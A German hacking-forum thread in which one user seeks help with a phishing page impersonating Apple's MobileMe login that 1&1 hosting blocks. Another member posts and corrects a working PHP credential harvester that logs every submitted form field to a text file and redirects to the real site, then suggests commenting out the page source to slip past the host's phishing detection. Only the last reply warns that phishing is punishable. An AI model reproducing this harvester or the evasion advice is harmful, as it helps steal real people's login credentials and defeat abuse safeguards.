Hey Leute,
also ich habe folgendes Problem. . . Habe mich gestern bei 1&1 angemeldet und mir eine Domain gekauft . me-activation.com (VORSICHT PHISHING PAGE). Auf jeden Fall klappt es auf anderen free hostern prima und alles funktioniert so wie es sein sollte jedoch bei 1&1 bekomme ich diese fehlermeldung. . .
ZUGRIFF NICHT ERLAUBT
Die angeforderte Seite darf nicht angezeigt werden.
Loggt euch einfach mal ein (natürlich nicht mit euren echten mac/me daten falls vorhanden) dann seht ihr was ich meine. Weiß zufällig jemand wie ich das umgehen kann ? hier sind die files die ich hochgeladen habe . . .
http://ul.to/aekan9
Ergebnis 1 bis 7 von 7
-
16.08.2009, 05:12 #1Trojaner
- Registriert seit
- 28.10.2008
- Beiträge
- 62
Phishing bei 1&1-Hosting Unmöglich?
Geändert von VeN0m (16.08.2009 um 11:17 Uhr) Grund: Verwirrende Überschrift angepasst
-
16.08.2009, 11:13 #2Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Der Code gefällt mir garnicht, sorry.PHP-Code:<?php
header ('Location: http://www.me.com ');
?>
<?php
$username = $_POST["rodneyjerkins52@googlemail.com"];
$pw = $_POST["password"];
$d = fopen("sag ich nich :D.txt","a");
fwrite ($d,"Username: $username
Password: $pw
");
fclose($d);
?>
müsste doch username sein?PHP-Code:$_POST["rodneyjerkins52@googlemail.com"];
Try it like this...PHP-Code:<?php
header ('Location: http://www.me.com ');
$d = fopen("sag ich nich :D.txt","a");
foreach($_POST AS $key => $value) {
fwrite($d,$key."=".$value."\r\n");
}
fwrite($d,"\r\n");
fclose($d);
?>
Würde aber nicht sagen, dass es am Script liegt. Vielleicht sind 1&1 selbst solche Phishingseiten bekannt und sie blocken sowas, denke ich aber auch nicht.
Wann genau kommt denn der Fehler? Beim absenden des Formulars?
Würde Dir empfehlen, die Seite nochmal neu zu speichern...Come to the dark side - We have cookies
-
16.08.2009, 11:40 #3Trojaner
- Registriert seit
- 28.10.2008
- Beiträge
- 62
nein die fehleer meldung kommt nachdem man auf der phishing seite "Activate" drückt also bei der weiterleitung
-
16.08.2009, 11:46 #4Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Und es wird nichts in die Datei eingetragen? Ich würde sonst vermuten, dass beim header() was falsch läuft und die Zielseite gemeint ist, nicht Deine. Eine deutsche Fehlermeldung wäre für einen HTTP-Error (wie "permissions denied", zu umgehen durch einen höheren CHMOD) ungewöhnlich, könnte aber auch sein ^^. Dann wäre "Die Seite darf nicht angezeigt werden" dennoch ungewöhnlich.
Come to the dark side - We have cookies
-
16.08.2009, 12:03 #5Trojaner
- Registriert seit
- 28.10.2008
- Beiträge
- 62
nein es wird nichts eingetragen
auf anderen webhostern funkt alles prima
ich denke man muss die php so umschreiben oda die index.html das 1&1 es sozusagen nicht erkennt aber wer würde sich hier schon die mühe für machen ?
-
16.08.2009, 12:07 #6Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Naja, füg halt ein paar Kommentare ein ^^ (in der index.html).
<!--Kommentar-->
Vielleicht hat 1&1 wirklich eine "Heuristik", die Phishingseiten an ihrem Quelltext erkennt. Wenn Du nun einfach jede Zeile kommentierst kannst Du das vielleicht aushebeln. Wer weiß... Vielleicht liegt es auch an was ganz anderem, der Code sah aber eigentlich in Ordnung aus, daher bliebe das auch meine letzte Vermutung.Come to the dark side - We have cookies
-
16.08.2009, 12:15 #7Auf Wunsch deaktiviert
- Registriert seit
- 21.01.2009
- Beiträge
- 311
sowit ich weis braucht man eine index.html... ich hab auch einen host bei 1und1 ich teste es mal schnell okay... und oishing würde ich auf 1und1 nicht betreiben
Gibt doch genug andere Seiten für sowas. Beachte Pishing ist auch eine Strafe. Und dagegen wird 1und1 dann auch warscheinlich vorgehen. Da gibts glaub ich sogar auf deinem host Logs. Kannst mal reingucken.
Zitieren
